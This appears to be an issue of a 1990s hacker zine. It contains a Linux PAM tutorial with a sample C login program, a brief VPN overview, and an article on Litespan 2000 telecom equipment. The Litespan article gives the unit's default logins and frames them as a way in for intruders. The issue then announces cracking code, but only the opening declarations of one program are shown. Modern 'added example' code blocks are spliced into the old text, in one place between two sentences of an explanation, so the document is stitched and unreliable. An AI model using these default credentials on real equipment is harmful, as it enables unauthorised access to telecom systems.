Enter PAM. PAM stands for 'Pluggable Authentication Modules', and it is a way of allowing a sysadmin to set up authentication on programs and services on their system without having to recompile everything. With PAM, you are able to edit a configuration file, and easily control the module.

The idea behind PAM was created by both Vipin Samar and Roland J. Schemers, who released their ideas in DCE-RFC-86.0 (rfc86.0.txt, see References on where to get a copy of it) in October 1995.
Both Samar and Schemers worked for Sun Microsystems, but to date, the only UNIX version that really supports PAM is Linux, and in particular Red Hat Linux, which has used PAM since Red Hat 3.0.4. In Solaris 2.5 PAM was partially implemented, and in Solaris 2.6, it is expected to be fully functional.

If you are running a version of Red Hat after 3.0.4, then you have been using PAM and may not have known about it, since Red Hat's RPM package manager automatically handles the changes to PAM if a package you install requires it.

+------------------------------+
| II. Modules                  |
+------------------------------+

There are 4 types of modules defined in the PAM standard.

    auth:     provide the actual authentication (i.e. asking for and
              checking a password, and setting 'credentials' like groups,
              or creating a kerberos 'ticket')
    account:  check to see if authentication is allowed, the account has
              not expired or been deleted, the user is allowed to log in,
              etc.
    password: used to set passwords
    session:  used once a user has successfully been authenticated to make
              it possible to actually use their account, and mount their
              home directory, or make their mail available, etc.

Modules are made to be 'stacked' so that multiple modules can be used. For example, rlogin normally makes use of at least 2 authentication methods: it first uses rhosts authentication, and if it succeeds, the connection is opened; if not, standard password authentication is done.

New modules can be added at any time, and PAM aware applications can then be made to use them. For example, if you use a one-time-password system for something, then you can easily make a module to support it, since documentation for writing modules is included with the system, and PAM aware programs can use the new module and use the one-time-password system without recompiling or modifying in any way.
Here is a list of the modules that people are using/developing for use with Linux-PAM:

The point of having modules is that you can just plug them in(!) In other words, they do not need to be compiled with the Linux-PAM library to work. Here are some alternative sources for modules that are being provided independently of the main library:

- Thorsten Kukuk has produced a pam_keylogin module for NIS+ support.
  ftp://weber.uni-paderborn.de/pub/linux/NIS/
- Luigi Catuogno is working on a Transparent Cryptographic Filesystem PAM module
  ftp://mikonos.dia.unisa.it/pub/tcfs/v2.0/pam
- Tom Ryan's modules: http://camlaw.rutgers.edu/pam/
- Tim Baverstock's modules (and more): http://www.mmm.co.uk/~warwick/pam/
- Kenny MacDonald has been making progress with a pam_nw_auth module.
  K.MacDonald@ed.ac.uk
- David Airlie has produced a module that validates a username/password combination using an NT server; it allows for domain validation.
  http://www.csn.ul.ie/~airlied/pam_smb/

The following modules are (mostly) to be found in the Linux-PAM source tree:

- pam_cracklib: strength checking for new passwords. Requires the cracklib library to compile: libcrack. Intended for stacking before other password modules.
  Cristian Gafton gafton@sorosis.ro
- pam_deny: deny all forms of access
  Andrew Morgan morgan@parc.power.net
- pam_desgold: Enigma Logic DESGold card -- smart card http://www.safeword.com/
  Alexander O. Yuriev alex@yuriev.com
- pam_filter: module to allow easy access to the stdin/out of a running process. It can be used to log users' input etc. Current pluggable filters include:
    - upperLOWER: demonstration filter that transposes upper and lower case characters.
  You are encouraged to write your own. (Email if you need help.)
  Andrew Morgan morgan@parc.power.net
- pam_ftp: A module that checks if the user is `ftp' or `anonymous'. On finding this to be the case, it prompts for an email address for a password, and proceeds to set the PAM_RUSER item with this value.
  Andrew Morgan morgan@parc.power.net
- pam_group: extension to the /etc/group concept. This module grants group privileges based on who the user is, when/where they are requesting a service from, and what they are trying to do.
  Andrew Morgan morgan@parc.power.net
- pam_kerberos: Kerberos authentication scheme
  Theodore Y. Ts'o tytso@mit.edu
  An implementation has been written for Kerberos 4 authentication - ftp://ftp.dementia.org/pub/pam/
  Derrick J Brashear shadow+@andrew.cmu.edu
  Kerberos 5 authentication too - http://www-personal.engin.umich.edu/~itoi/
  Naomaru Itoi itoi@eecs.umich.edu
- pam_limits: a module to set the resource limits for a service. Two implementations of this have been merged to produce this module.
  Cristian Gafton gafton@main.sorosis.ro and Elliot Lee sopwith@redhat.com
- pam_listfile: authenticate users based on the contents of a specified file.
  Elliot Lee sopwith@redhat.com
- pam_nologin: This module always lets root in; it lets other users in only if the file /etc/nologin doesn't exist. In any case, if /etc/nologin exists, its contents are displayed to the user.
  Michael K. Johnson johnsonm@redhat.com
- pam_opie: For background information, NRL OPIE is a newer one-time password ftp://ftp.funet.fi/pub/unix/security/login/nrl-opie . The official OPIE archive site is ftp://ftp.nrl.navy.mil/pub/security/opie . The contrib subdirectory contains a number of S/Key, OTP, and OPIE compatible one-time password calculators for Mac, PC, etc.
  Andy Berkheimer andy@tho.org
  http://www.tjhsst.edu/~aberkhei/ <--- PAM module source is here.
- pam_passwd+: password strength checking
  Al Longyear longyear@netcom.com
- pam_permit: always allow access
  Andrew Morgan morgan@parc.power.net
- pam_pwdb: plug in replacement for pam_unix_* that uses the Password Database library found at: http://parc.power.net/morgan/libpwdb/
  Andrew Morgan morgan@parc.power.net
- pam_radius: RADIUS authentication, using the Password Database library.
  Cristian Gafton gafton@sorosis.ro
- pam_rhosts: rhost verification as per rlogin etc.
  Al Longyear longyear@netcom.com
- pam_rootok: module to authenticate the user if their (real) uid is root (intended for use with the sufficient control flag)
  Andrew Morgan <morgan@parc.power.net>
- pam_securetty: /etc/securetty access controls
  Elliot Lee sopwith@redhat.com
- pam_shells: authenticate users if their shell is listed in the /etc/shells file.
  Erik Troan ewt@redhat.com
- pam_sid: Smart card - SecureID
  SecureID - http://www.secnet.com
  Some comments on security problems - ftp://ftp.secnet.com/pub/papers/securid.ps
  Alexander O. Yuriev alex@bach.cis.temple.edu
- pam_skey: S/Key authentication
  Jeff Uphoff juphoff@tarsier.cv.nrao.edu
  ftp://linux.nrao.edu/pub/people/juphoff/PAM/
- pam_skey2: is being worked on by Sean Reifschneider - jafo@tummy.com
- pam_stress: stress test your application with this module.
  Andrew Morgan morgan@parc.power.net
- pam_tally: this module keeps track of the number of times an attempt is made to access an account. It can deny access after a specified number of failures. Root's account can be treated specially.
  Tim Baverstock warwick@mmm.co.uk
- pam_time: authorize users based on when and where they log in (like securetty, but) in a way that is dependent on the service they are requesting
  Andrew Morgan morgan@parc.power.net
- pam_unix_*: standard unix authentication (with some shadow support). This module is being supported by Red Hat.
  Michael K. Johnson johnsonm@redhat.com
- pam_warn: provides a diagnostic tool for dumping information to syslog(2) about the service-application.
  Andrew G. Morgan morgan@parc.power.net
- pam_wheel: for enforcing the wheel group privileges
  Cristian Gafton gafton@sorosis.ro

+------------------------------+
| III. Services                |
+------------------------------+

A quick note about services. Each program that uses PAM defines its own service name.
The login program defines the service type login, ftpd defines the service type ftp, and so on. In general, the service type is the name of the program used to _access_ the service, not the program used to _provide_ the service. (The ftpd being defined as ftp is an example.)

+------------------------------+
| IV. Configuration Files      |
+------------------------------+

The directory /etc/pam.d is used to configure all PAM applications. Earlier PAM versions used /etc/pam.conf, but that file is now only read if no /etc/pam.d/ entry is found. Each application (service) has its own file. A file might look a little something like this (this is the file for the basic login 'service'):

    #%PAM-1.0
    #Module Type  Control Flag  Module Path                     Options
    #-----------  ------------  -----------                     -------
    auth          required      /lib/security/pam_securetty.so
    auth          required      /lib/security/pam_pwdb.so       shadow nullok
    auth          required      /lib/security/pam_nologin.so
    account       required      /lib/security/pam_pwdb.so
    password      required      /lib/security/pam_cracklib.so
    password      required      /lib/security/pam_pwdb.so       shadow nullok use_authtok
    session       required      /lib/security/pam_pwdb.so

The first 3 lines are, of course, comments. The next 3 lines stack up 3 modules for use in login authorization. The first line makes sure that if the user is trying to log in as root, the tty they are logging in on is listed in /etc/securetty, if the file does exist. The second line causes the user to be asked for a password and then checks the password. The third line then looks to see if the file /etc/nologin exists, and if it does, displays the contents of the file, and then boots off the user if it is not root.

Note that all three of these modules are checked, _even if the first module fails_. This was built in as a security precaution. If a user (read: hacker) knew why the authentication failed, then they might be able to figure out how to get around the problem and break the authentication easily.
If you want to change this, you can change 'required' to 'requisite', since if a requisite module fails, PAM fails immediately and does not call the other modules.

The line after that (line 7) checks and causes any necessary accounting to be done (i.e. if shadow passwords have been enabled, the pam_pwdb.so module would check to see if the account has expired, or if the user's password has expired and needs to be changed).

Line 8 then specifies that if the login changes the user's password, it should use pam_pwdb.so to do it. This will only occur if the auth module determines that the password needs to be changed, for example, if the shadow password has expired.

The last line then goes on to specify that pam_pwdb.so should be used to manage the session. Currently, that module does not do anything, but it could be replaced, or supplemented by stacking a module or two.

Note that the order of the lines matters. While it may not matter for the order of the required modules, it matters for the other control flags available for use. sufficient and requisite cause order to be important, as does optional, which is a flag that is rarely used. For an example of this, turn to your rlogin auth configuration, which should look something like:

    auth  required    /lib/security/pam_securetty.so
    auth  sufficient  /lib/security/pam_rhosts_auth.so
    auth  required    /lib/security/pam_pwdb.so shadow nullok
    auth  required    /lib/security/pam_nologin.so

Now, this file looks almost like the login entry, but the extra line and the sufficient flag make the order of the modules important. First off, pam_securetty.so keeps root from logging in on insecure terminals, which quite effectively prevents rhost root logins. If you wish to allow them you can simply remove that line. Second, if pam_rhosts_auth.so authenticates the user, then PAM skips the password checking; otherwise, if it fails, then the failed authentication is ignored.
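The control-flag rules described in this section can be checked against the rlogin stack with a small simulator. The following C program is an added example, not code from the article or from Linux-PAM: module outcomes are simulated, run_stack() and its helpers are hypothetical names, and the rules that an empty stack fails and that a stack passes only if at least one module succeeded are simplifying assumptions.

```c
/* Added example: models how PAM control flags combine in one stack.
 * Module results are simulated; no PAM library is called. */
#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 16
enum flag { REQUIRED, REQUISITE, SUFFICIENT, OPTIONAL };
enum { STACK_OK = 0, STACK_FAIL = 1, STACK_BAD_CONFIG = 2 };

struct entry   { char type[16]; enum flag flag; char module[128]; };
struct verdict { int result; int called; };  /* called = modules actually run */

/* Constructed sample: the rlogin auth stack discussed in the article. */
static const char RLOGIN_CONF[] =
    "#%PAM-1.0\n"
    "auth required   /lib/security/pam_securetty.so\n"
    "auth sufficient /lib/security/pam_rhosts_auth.so\n"
    "auth required   /lib/security/pam_pwdb.so shadow nullok\n"
    "auth required   /lib/security/pam_nologin.so\n";

/* Constructed variant: the securetty check made requisite. */
static const char RLOGIN_REQUISITE_CONF[] =
    "auth requisite  /lib/security/pam_securetty.so\n"
    "auth sufficient /lib/security/pam_rhosts_auth.so\n"
    "auth required   /lib/security/pam_pwdb.so shadow nullok\n"
    "auth required   /lib/security/pam_nologin.so\n";

/* Parse one line: 1 = entry, 0 = blank or comment, -1 = malformed. */
static int parse_line(const char *line, struct entry *e)
{
    char flag[16], path[128];
    const char *base;

    line += strspn(line, " \t");
    if (*line == '\0' || *line == '#') return 0;
    if (sscanf(line, "%15s %15s %127s", e->type, flag, path) != 3) return -1;

    if      (!strcmp(flag, "required"))   e->flag = REQUIRED;
    else if (!strcmp(flag, "requisite"))  e->flag = REQUISITE;
    else if (!strcmp(flag, "sufficient")) e->flag = SUFFICIENT;
    else if (!strcmp(flag, "optional"))   e->flag = OPTIONAL;
    else return -1;   /* unknown or misspelled flag: refuse, never guess */

    base = strrchr(path, '/');
    snprintf(e->module, sizeof e->module, "%s", base ? base + 1 : path);
    return 1;
}

/* Collect the entries of one module type; -1 if any line is malformed. */
static int load_stack(const char *conf, const char *type, struct entry *out)
{
    int n = 0;

    while (*conf) {
        char line[256];
        size_t len = strcspn(conf, "\n");
        struct entry e;
        int rc;

        snprintf(line, sizeof line, "%.*s", (int)len, conf);
        conf += len + (conf[len] == '\n');
        rc = parse_line(line, &e);
        if (rc < 0) return -1;
        if (rc == 1 && !strcmp(e.type, type)) {
            if (n == MAX_ENTRIES) return -1;
            out[n++] = e;
        }
    }
    return n;
}

/* failing: space-separated names of the modules the simulation makes fail. */
struct verdict run_stack(const char *conf, const char *type, const char *failing)
{
    struct entry stack[MAX_ENTRIES];
    struct verdict v = { STACK_FAIL, 0 };      /* fail closed by default */
    int required_failed = 0, any_success = 0;
    int n = load_stack(conf, type, stack);

    if (n < 0) { v.result = STACK_BAD_CONFIG; return v; }
    for (int i = 0; i < n; i++) {
        int failed = strstr(failing, stack[i].module) != NULL;

        v.called++;
        if (!failed) any_success = 1;
        switch (stack[i].flag) {
        case REQUIRED:   /* remember the failure but keep going */
            if (failed) required_failed = 1;
            break;
        case REQUISITE:  /* failure ends the stack at once */
            if (failed) return v;
            break;
        case SUFFICIENT: /* success ends the stack unless a required failed */
            if (!failed && !required_failed) { v.result = STACK_OK; return v; }
            break;
        case OPTIONAL:   /* outcome does not decide the verdict */
            break;
        }
    }
    if (!required_failed && any_success) v.result = STACK_OK;
    return v;
}

int main(void)
{
    struct verdict v = run_stack(RLOGIN_CONF, "auth", "pam_securetty.so");
    printf("securetty fails, rhosts succeeds: result=%d after %d modules\n",
           v.result, v.called);
    return 0;
}
```

With 'required', a failed securetty check still runs all four modules before access is denied; with 'requisite', the stack stops after the first module and no password is asked for.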
If pam_rhosts_auth.so fails to authenticate the user, then pam_pwdb.so is used to do normal password authentication. Finally, pam_nologin.so checks /etc/nologin.

Note that if you do not want to prompt for a password if the securetty checks fail, then you can modify pam_securetty.so from required to requisite.

+------------------------------+
| V. Shadow Passwords          |
+------------------------------+

A quick note for Red Hat users: if you wish to use PAM and shadow passwords, you are in luck. pam_pwdb.so can support shadow passwords. To convert your system for shadow passwords, use the following commands:

    cd /etc
    pwconv5
    chmod 600 passwd- shadow-

pam_pwdb.so will automatically detect that you have implemented shadow passwords, and it will make all the adjustments necessary.

+------------------------------+
| VI. How It Works             |
+------------------------------+

The core components of the PAM framework are the authentication library API front end and the authentication mechanism-specific modules back end, connected through the Service Provider Interface. Applications write to the PAM API, while the authentication-system providers write to the PAM SPI and supply the back end modules that are independent of the application.

       ftp    telnet   login        <-- Applications
        |        |        |
        +--------+--------+
                 |
           +-----+-----+
           |  PAM API  |            <-- pam.conf | /etc/pam.d/
           +-----+-----+
                 |
        +--------+--------+
      UNIX   Kerberos  Smart Cards  <-- Mechanisms

           Basic PAM Architecture

The figure above illustrates the relationship between the application, the PAM library, and the authentication modules. Three applications (login, telnet and ftp) are shown which use the PAM authentication interfaces. When an application makes a call to the PAM API, it loads the appropriate authentication module as determined by the configuration file, /etc/pam.d/, unless this is not found, then pam.conf is used. The request is forwarded to the underlying authentication module (for example, UNIX password, Kerberos, etc.)
to perform the specified operation. The PAM layer then returns the response from the authentication module to the application.

PAM unifies system authentication and access control for the system, and allows plugging of associated authentication modules through well defined interfaces. The plugging can be defined through various means, one of which uses a configuration file, as shown in Section IV. For each of the system applications, the file specifies the authentication module that should be loaded.

+------------------------------+
| VII. The PAM API             |
+------------------------------+

The following should give you a basic description of the various interfaces of PAM. Since the goal here is just for you to get a working knowledge about the PAM interfaces, not all flags and options have been fully defined and explained.

--------------------
Framework Layer APIs
--------------------

    int pam_start( char *service_name, char *user,
                   struct pam_conv *pam_conversation,
                   pam_handle_t **pamh );

pam_start() is called to initiate an authentication transaction. pam_start() takes as arguments the name of the service, the name of the user to be authenticated, and the address of the conversation structure. pamh is later used as a handle for subsequent calls to the PAM library.

The PAM modules do not communicate directly with the user; instead they rely on the application to perform all such interaction. The application needs to provide the conversation function, conv(), and associated application data pointers through a pam_conv structure when it initiates an authentication transaction. The module uses the conv() function to prompt the user for data, display error messages, or text information.

    int pam_end( pam_handle_t *pamh, int pam_status );

pam_end() is called to terminate the PAM transaction as specified by pamh, and to free any storage area allocated by the PAM modules with pam_set_item().
    int pam_set_item( pam_handle_t *pamh, int item_type, void *item );
    int pam_get_item( pam_handle_t *pamh, int item_type, void **item );

pam_get_item() and pam_set_item() allow the parameters specified in the initial call to pam_start() to be read and updated. This is useful when a particular parameter is not available when pam_start() is called or must be modified after the initial call to pam_start(). pam_set_item() is passed a pointer to the object, item, and its type, item_type. pam_get_item() is passed the address of the pointer, item, which is assigned the address of the requested object.

The item_type will be one of the following:

    +----------------+--------------------------------------+
    | Item Name      | Description                          |
    +----------------+--------------------------------------+
    | PAM_SERVICE    | The service name                     |
    | PAM_USER       | The user name                        |
    | PAM_TTY        | The tty name                         |
    | PAM_RHOST      | The remote host name                 |
    | PAM_CONV       | The pam_conv structure               |
    | PAM_AUTHTOK    | The authentication token (password)  |
    | PAM_OLDAUTHTOK | The old authentication token         |
    | PAM_RUSER      | The remote user name                 |
    +----------------+--------------------------------------+

Note that the values of PAM_AUTHTOK and PAM_OLDAUTHTOK are only available to PAM modules and not to the applications. They are explicitly cleared out by the framework before returning to the application.

    char *pam_strerror( int errnum );

pam_strerror() maps the error number to a PAM error message string, and returns a pointer to that string.

    int pam_set_data( pam_handle_t *pamh, char *module_data_name, char *data,
                      void (*cleanup)(pam_handle_t *pamh, char *data,
                                      int error_status) );

The pam_set_data() function stores module specific data within the PAM handle. The module_data_name uniquely specifies the name to which some data and a cleanup callback function can be attached. The cleanup function is called when pam_end() is invoked.
    int pam_get_data( pam_handle_t *pamh, char *module_data_name,
                      void **datap );

The pam_get_data() function obtains module-specific data from the PAM handle stored previously by the pam_set_data() function. The module_data_name uniquely specifies the name for which data has to be obtained. This function is normally used to retrieve module specific state information.

-------------------
Authentication APIs
-------------------

    int pam_authenticate( pam_handle_t *pamh, int flags );

The pam_authenticate() function is called to verify the identity of the current user. The user is usually required to enter a password or similar authentication token, depending upon the authentication module configured with the system. The user in question is specified by a prior call to pam_start(), and is referenced by the authentication handle, pamh.

    int pam_setcred( pam_handle_t *pamh, int flags );

The pam_setcred() function is called to set the credentials of the current process associated with the authentication handle, pamh. The actions that can be denoted through flags include credential initialization, refresh, reinitialization and deletion.

------------------------
Password Management APIs
------------------------

    int pam_chauthtok( pam_handle_t *pamh, int flags );

pam_chauthtok() is called to change the authentication token associated with the user referenced by the authentication handle pamh. After the call, the authentication token of the user will be changed in accordance with the authentication module configured on the system.

-----------------------
Session Management APIs
-----------------------

    int pam_open_session( pam_handle_t *pamh, int flags );

pam_open_session() is called to inform the session modules that a new session has been initialized. All programs which use PAM should invoke pam_open_session() when beginning a new session.
    int pam_close_session( pam_handle_t *pamh, int flags );

Upon termination of this session, the pam_close_session() function should be invoked to inform the underlying modules that the session has terminated.

----------------------
Account Management API
----------------------

    int pam_acct_mgmt( pam_handle_t *pamh, int flags );

The function pam_acct_mgmt() is called to determine whether the current user's account and password are valid. This typically includes checking for password and account expiration, valid login times, etc. The user in question is specified by a prior call to pam_start() and is referenced by the authentication handle, pamh.

-----------------------------------
The PAM Service Provider Interface:
-----------------------------------

This is very similar to the PAM API, except for one extra parameter to pass module-specific options to the underlying modules.

+------------------------------+
| VIII. Sample PAM Application |
+------------------------------+

Below is a sample login application which uses the PAM APIs. It is not meant to be a fully functional login program; a lot of functionality has been left out in order to show and emphasize the use of PAM APIs.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <grp.h>
    #include <pwd.h>
    #include <security/pam_appl.h>

    static int login_conv(int num_msg, struct pam_message **msg,
                          struct pam_response **response, void *appdata_ptr);
    static void login_exit(int exit_code);

    static struct pam_conv pam_conv = {login_conv, NULL};
    static pam_handle_t *pamh;      /* Authentication handle */

    /*
     * user_name, ttyn, remote_host, pwd, MAX_RETRIES, envinit, basicenv,
     * krb5ccname, ENVSTRNCAT and exec_the_shell() belong to the parts of
     * login that were left out of this sample.
     */

    int
    main(int argc, char *argv[], char **renvp)
    {
        int status = PAM_SUCCESS;
        int authenticated = 0, retry = 0;
        char *krb5p;

        /*
         * Call pam_start to initiate a PAM authentication operation
         */
        if ((pam_start("login", user_name, &pam_conv, &pamh))
            != PAM_SUCCESS)
            login_exit(1);

        pam_set_item(pamh, PAM_TTY, ttyn);
        pam_set_item(pamh, PAM_RHOST, remote_host);

        while (!authenticated && retry < MAX_RETRIES) {
            status = pam_authenticate(pamh, 0);
            authenticated = (status == PAM_SUCCESS);
            retry++;        /* count the attempt so the loop can end */
        }

        if (status != PAM_SUCCESS) {
            fprintf(stderr, "error: %s\n", pam_strerror(status));
            login_exit(1);
        }

        /* now check if the authenticated user is allowed to login. */
        if ((status = pam_acct_mgmt(pamh, 0)) != PAM_SUCCESS) {
            if (status == PAM_AUTHTOK_EXPIRED) {
                status = pam_chauthtok(pamh, 0);
                if (status != PAM_SUCCESS)
                    login_exit(1);
            } else {
                login_exit(1);
            }
        }

        /*
         * call pam_open_session to open the authenticated session
         * pam_close_session gets called by the process that
         * cleans up the utmp entry (i.e., init)
         */
        if ((status = pam_open_session(pamh, 0)) != PAM_SUCCESS) {
            login_exit(status);
        }

        /* set up the process credentials */
        setgid(pwd->pw_gid);

        /*
         * Initialize the supplementary group access list.
         * This should be done before pam_setcred because
         * the PAM modules might add groups during the pam_setcred call
         */
        initgroups(user_name, pwd->pw_gid);

        status = pam_setcred(pamh, PAM_ESTABLISH_CRED);
        if (status != PAM_SUCCESS) {
            login_exit(status);
        }

        /* set the real (and effective) UID */
        setuid(pwd->pw_uid);

        pam_end(pamh, PAM_SUCCESS);     /* Done using PAM */

        /*
         * Add DCE/Kerberos cred name, if any.
         * XXX - The module specific stuff should be removed from login
         * program eventually. This is better placed in DCE module and
         * will be once PAM has routines for "exporting" environment
         * variables.
         */
        krb5p = getenv("KRB5CCNAME");
        if (krb5p != NULL) {
            ENVSTRNCAT(krb5ccname, krb5p);
            envinit[basicenv++] = krb5ccname;
        }
        environ = envinit;      /* Switch to the new environment. */
        exec_the_shell();

        /* All done */
        return 0;
    }

    /*
     * login_exit - Call exit() and terminate.
     * This function is here for PAM so cleanup can
     * be done before the process exits.
     */
    static void
    login_exit(int exit_code)
    {
        if (pamh)
            pam_end(pamh, PAM_ABORT);
        exit(exit_code);
        /*NOTREACHED*/
    }

    /*
     * login_conv():
     * This is the conv (conversation) function called from
     * a PAM authentication module to print error messages
     * or garner information from the user.
     */
    static int
    login_conv(int num_msg, struct pam_message **msg,
               struct pam_response **response, void *appdata_ptr)
    {
        /* assumes *msg points to an array of num_msg messages */
        struct pam_message *m = *msg;
        struct pam_response *r;

        /* one response slot per message, handed back to the caller */
        r = calloc(num_msg, sizeof(struct pam_response));
        if (r == NULL)
            return (PAM_CONV_ERR);
        *response = r;

        while (num_msg--) {
            switch (m->msg_style) {
            case PAM_PROMPT_ECHO_OFF:
                r->resp = strdup(getpass(m->msg));
                break;
            case PAM_PROMPT_ECHO_ON:
                (void) fputs(m->msg, stdout);
                r->resp = malloc(PAM_MAX_RESP_SIZE);
                fgets(r->resp, PAM_MAX_RESP_SIZE, stdin);
                /* add code here to remove \n from fgets */
                break;
            case PAM_ERROR_MSG:
                (void) fputs(m->msg, stderr);
                break;
            case PAM_TEXT_INFO:
                (void) fputs(m->msg, stdout);
                break;
            default:
                /* add code here to log error message, etc */
                break;
            }
            m++;
            r++;
        }
        return (PAM_SUCCESS);
    }

+------------------------------+
| IX. References               |
+------------------------------+

DCE-RFC-86.0 (rfc86.0.txt) - http://www.redhat.com/linux-info/PAM/rfc86.0.txt ( among a million other places )
Red Hat PAM info - http://www.redhat.com/linux-info/PAM/
Linux-PAM Effort - http://www.parc.power.net/morgan/Linux-PAM/index.html
    System Administrator's Guide
    Module Writer's Guide
    Application Developer's Manual

------------------------------------------------------------
09 of 16

VPN's Demystified
by Meikon, Special to thtj

VPN's, short for Virtual Private Networks, are secure networks that implement encryption to communicate between two users. They allow private communication over virtual WANs or LANs. The VPN can also be implemented in X.25 networks. VPN's also provide secure data transmission with Tunneling Protocol through the Internet. With standard networks, a sniffer can easily overcome security.

In a VPN, there are three implementations used.

1. Encryption - use of an algorithm to encrypt and decrypt data transfer.
2. Authentication - confirmation of a user's identity on the network (use public key authentication to confirm the user's connection), also sometimes use of login and password, which is vulnerable to crackers.
3. Data Integrity - hash used, different hashes used: Message Digest (MD5), Secure Hash Algorithm1 (SHA-1). The MD5 Hash generates 128-bit keys.
   The SHA-1 Hash generates 160-bit keys.

- VPN's Sources on the Internet -

http://www.TeleCommerce.com/ - TeleCommerce, Inc
http://www.francetelecom.fr/ - France Telecom
http://www.rad.net.id/homes/edward/intranet/intra7 - Information on VPN's

═───────────────────────────────────────────────────────────═
10 of 16
LiteSpan 2000
by XiLiCoN, Special to thtj

A Litespan 2000 unit is a Synchronous Optical Network (SONET) based Optical
Loop Carrier (OLC) system. It provides 4 system functions. Those systems are
as follows:

DLC)   Digital Loop Carrier: Provides 2,016 DS0s of bandwidth for delivery
       of services such as data, coin, or dial tone.
DCS)   Digital Cross Connect System: Takes apart DS1 signals into DS0,
       rearranges them and puts them back into DS1 signals. This is known
       as 1-0-1 cross-connect.
SONET) Fiber transport system: Uses lightwave technology and SONET protocol
       to transport signals between Litespan terminals.
MUX)   Multiplexer: Takes multiple low speed signals (DS0s, DS1s) and
       interleaves them to form a single high speed data stream at SONET
       bit rates.

_,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,__,.-System Security-.,_,.-~-.,_,.-~-.,,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_

The Litespan provides two levels of security to maintain system integrity.
These security levels control who can access the system and what the
authorized user is allowed to do in the system.

- Each authorized user is assigned a set of privileges that determine the
  actions allowed to the user.
- The Litespan maintains an internal list of authorized user IDs, passwords,
  and user privileges.
- There are up to 20 users possible.

Now to access security. You will be prompted for a User Id and a Password at
a terminal that looks much like this:

        OMAPS Log In
        OMAPS V05.01.05
        Copyright 1997 Optlink Corp.
        All Rights Reserved

        User Id:
        Password:

Now for the ball busting part. If you repeat the login procedure incorrectly
5 times you will be locked out of the system.
Also, the user IDs can be up to 20 characters, numbers or letters, in both
upper and lower case. Same with the password. The Litespan has a sysadmin
like in a unix system, but the Litespan admin usually has a long beard and a
smug expression. But it is possible that a dumb sysadmin will leave in the
default logins/passwords. Those are as follows:

        User Id: optlink
        Password: optlink

and..

        User Id: sysadmin
        Password: sysadmin

Well, that gives you a look at System Security from the outside. Look at
part 3 if you were able to get in. It gives a rundown on User Privileges.

User Privileges.

Well, user privileges are important; the sysadmin maintains a file in the
system that gives different users different privileges. The user privileges
file will be set up somewhat like this:

User Id   Password   CP M M0 M1 N NR P PR P0 P1 S T
User1     *****      x x x x x x
User2     *****      x x x x x x

That is a basic layout. The CP, M, M0 etc. are privileges. The X's are
basically checks allowing a certain user to perform a certain act in the
system. The different privileges are as follows:

CP = Allows someone to change the user id, password or privileges of any
     user on the system. This is one of the sysadmin's privileges for the
     most part.
M0 = Maintenance privilege (DS0 only)
M1 = Maintenance privilege (DS1 only)
MR = Maintenance READ ONLY privilege
N  = Network Administrative privilege; Allows backup and restore of database
NR = Network Administrative READ ONLY privilege; Allows access to network
     information
P  = Provisioning privilege; Necessary to make changes from the provisioning
     menu
P0 = Provisioning privilege (DS0 only)
P1 = Provisioning privilege (DS1 only)
PR = Provisioning READ ONLY privilege
S  = System Administrative privilege; Necessary to make changes from the
     administrative menu
T  = Testing privilege; Allows execution of testing commands

Well, that's it!
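An added example, not part of XiLiCoN's article: a short Python audit of a privilege table like the one above, flagging the default user IDs, every holder of CP, and narrower grants made moot by a full privilege. The one-user-per-line text format and the rule that M, N and P cover their read-only and DS0/DS1-only variants are assumptions made for this example; the privilege codes, default IDs and limits are the ones listed in the article.

```python
# Added example: audit of a Litespan-style privilege table.
# The text format parsed here is an assumption made for this example.

PRIVILEGES = {"CP", "M", "M0", "M1", "MR", "N", "NR",
              "P", "P0", "P1", "PR", "S", "T"}
DEFAULT_IDS = {"optlink", "sysadmin"}   # default logins named in the article
MAX_USERS = 20                          # article: up to 20 users
MAX_ID_LEN = 20                         # article: IDs up to 20 characters

# Assumption: a full privilege covers its DS0/DS1-only and READ ONLY variants.
SUPERSEDES = {"M": {"M0", "M1", "MR"}, "N": {"NR"}, "P": {"P0", "P1", "PR"}}

SAMPLE_TABLE = """\
# constructed sample data, not taken from a real unit
optlink   CP,M,N,P,S,T
sysadmin  CP,S
jdoe      MR,NR,PR
tech7     M0,P0,PR,T
noc_ro    NR,PR,P
"""


def parse_table(text):
    """Return {user_id: set_of_privileges}; reject malformed or unknown entries."""
    users = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<user id> <privileges>'")
        user, privs = parts[0], set(parts[1].split(","))
        unknown = privs - PRIVILEGES
        if unknown:
            raise ValueError(f"line {lineno}: unknown privilege(s) {sorted(unknown)}")
        if user in users:
            raise ValueError(f"line {lineno}: duplicate user id {user!r}")
        users[user] = privs
    return users


def audit(users):
    """Return a list of (user_id, finding) tuples, sorted by user id."""
    findings = []
    if len(users) > MAX_USERS:
        findings.append(("*", f"{len(users)} users exceeds the {MAX_USERS}-user limit"))
    for user, privs in sorted(users.items()):
        if user.lower() in DEFAULT_IDS:
            findings.append((user, "default user id still present"))
        if len(user) > MAX_ID_LEN:
            findings.append((user, f"user id longer than {MAX_ID_LEN} characters"))
        if "CP" in privs:
            findings.append(
                (user, "holds CP: can change any user's id, password or privileges"))
        for full, narrow in sorted(SUPERSEDES.items()):
            overlap = privs & narrow
            if full in privs and overlap:
                findings.append(
                    (user, f"{full} makes {','.join(sorted(overlap))} meaningless"))
    return findings


def cp_holders(users):
    """User ids that can rewrite the privilege table itself."""
    return sorted(u for u, p in users.items() if "CP" in p)


if __name__ == "__main__":
    for user, message in audit(parse_table(SAMPLE_TABLE)):
        print(f"{user:10s} {message}")
```

The noc_ro row is the case worth noticing: an account that looks read-only by name and by its NR/PR grants also carries P, so it can make provisioning changes.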
Triviality is only skin deep - XiLiCoN

═───────────────────────────────────────────────────────────═
The Code:

 o genericrack2.pas - The Messiah : Pascal code to crack encryption from an issue of CRH
 o genericrack2.c   - Shok        : C Ported code of genericrack2.pas
 o word.c           - memor       : Word List Processor
 o rm.c Fix         - Shok        : fixed holes in rm.c from thtj15

═───────────────────────────────────────────────────────────═
11 of 16
genericrack2.pas
By The Messiah, Staff Writer

program genericrack2;

uses
  SysUtils;

const
  MAXKEY = 1024;

var
  key, buffer : array[1..MAXKEY] of Byte;
